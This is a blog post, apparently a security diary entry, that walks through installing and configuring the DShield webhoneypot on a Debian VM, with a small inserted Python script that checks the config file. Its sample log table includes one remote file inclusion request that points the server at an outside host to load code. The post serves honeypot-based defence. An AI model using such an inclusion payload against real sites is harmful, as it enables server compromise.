Webhoneypot fun
37 days ago the DShield webhoneypot project released the first Alpha of the code. I hadn't really had much time to play with it yet, but one of our readers had a challenge with his submissions, so I figured I'd better get my hands dirty. Another reason is that there does seem to be a lot of malicious web traffic around at the moment and I wanted to grab some of it.
So here is a quick run down of my webhoneypot experience.
Firstly I logged into DShield and under "My Information" I entered the Honeypot URL and ticked the "Honeypot is Active" button.
Next, to grab the code. The code is hosted on Google and can be obtained here. The site has install information, and several releases are available: the raw code, a Debian package and a Mac OS X package. Looking at the install instructions, I decided to go with the Debian package. (Now, before you chuckle, it was because I only had about 15 minutes or so to get it done and, like many time-poor people, I like shortcuts. It was not because the install instructions are not good. In fact, quite the opposite.)
So I built a new Debian 5 VM on VirtualBox, which was straightforward. I only installed a very minimal system with Apache and PHP5. About 10 minutes gone.
After grabbing the deb file I installed it using the "Installation with a Debian Package" instructions, which took about 3 seconds or so. It asks you what port number you would like to use, sets up the relevant start jobs, etc. In short, it does pretty much everything for you. Once you have completed this step you have a honeypot running on the machine, and all you need to do is edit the /opt/webhoneypot/etc/config.local file and enter your DShield userid (which will be your email address) and password in the file (the lines are userid=yourdshieldemailaddress and password=thepasswordfortheuserid; do not use " characters).
The final step after this was to open a browser and go to the web page. When you hit the page you will get a message along the lines of "Check logfile for hashpassword". This basically verifies that you have successfully connected to DShield. You replace the password=thepasswordfortheuserid line with the hashpassword=738abc..... parameter from the log file and you are good to go.
Revisit the web page with, for example, a robots.txt request and you will get a response. When you look in the /opt/webhoneypot/logs/honey.... log file you will see an entry along the lines of timestamp IP-Address Delivered Template 123. If you see that, the log line was delivered (123 is just an example; you will see different numbers).
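A quick way to confirm that the two config.local steps above were completed, written as an added example that is not part of the webhoneypot code. It assumes the file is plain key=value lines (the handling of # comments is an assumption), and the function names and sample values are constructed for illustration.

```python
import re

# Constructed sample contents of /opt/webhoneypot/etc/config.local (values invented).
SAMPLE_BEFORE = 'userid="reader@example.org"\npassword=correct-horse\n'
SAMPLE_AFTER = "userid=reader@example.org\nhashpassword=0123abcd4567ef89\n"


def parse_config(text):
    """Return {key: value} from key=value lines (assumed format)."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        # Skip blanks, '#' comments (assumed) and lines without a key=value pair.
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip()
    return settings


def audit_config(text):
    """Return a list of findings; an empty list means both steps are done."""
    settings = parse_config(text)
    findings = []
    userid = settings.get("userid", "")
    if not userid:
        findings.append("userid is missing")
    elif not re.fullmatch(r"[^@\s]+@[^@\s]+", userid.strip('"')):
        findings.append("userid is not an email address")
    # The post says not to use " in the values.
    for key, value in settings.items():
        if '"' in value:
            findings.append(f"{key} contains a quote character")
    # After the first page hit, password= must be replaced by hashpassword=.
    if "password" in settings:
        findings.append("plaintext password is still present")
    if not settings.get("hashpassword"):
        findings.append("hashpassword is missing")
    return findings


if __name__ == "__main__":
    for name, text in (("before", SAMPLE_BEFORE), ("after", SAMPLE_AFTER)):
        print(name, audit_config(text) or "ok")
```

To check a real install, pass the contents of /opt/webhoneypot/etc/config.local to audit_config() instead of the samples.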
Log into DShield again and under the "My Weblogs" tag you should see your test log entries. For example:
Time | URL | Source | Target
11:11:33 | GET /robots.txt HTTP/1.1 | 192.168.22.10 | 202.999.999.24
11:14:29 | GET /robots.txt HTTP/1.1 | 192.168.22.10 | 202.999.999.24
11:12:36 | GET /i.php?page=http://204.2.183.2/babycaleb/picture.htm? HTTP/1.1 | 192.168.22.10 | 202.999.999.24
Total time taken, twenty minutes. Ten minutes to install an OS onto the VM and five minutes or so because I borked my VM's network connection. A final five minutes to install and configure the Honeypot.
The guys on the team have done a great job. If you have a spare IP this is a great way to contribute. Give it a go.
Mark H - Shearwater
For those of you that are students and think Honeypots might be something you are interested in, then check out the Honeynet Project Google Summer of Code page http://www.honeynet.org/gsoc .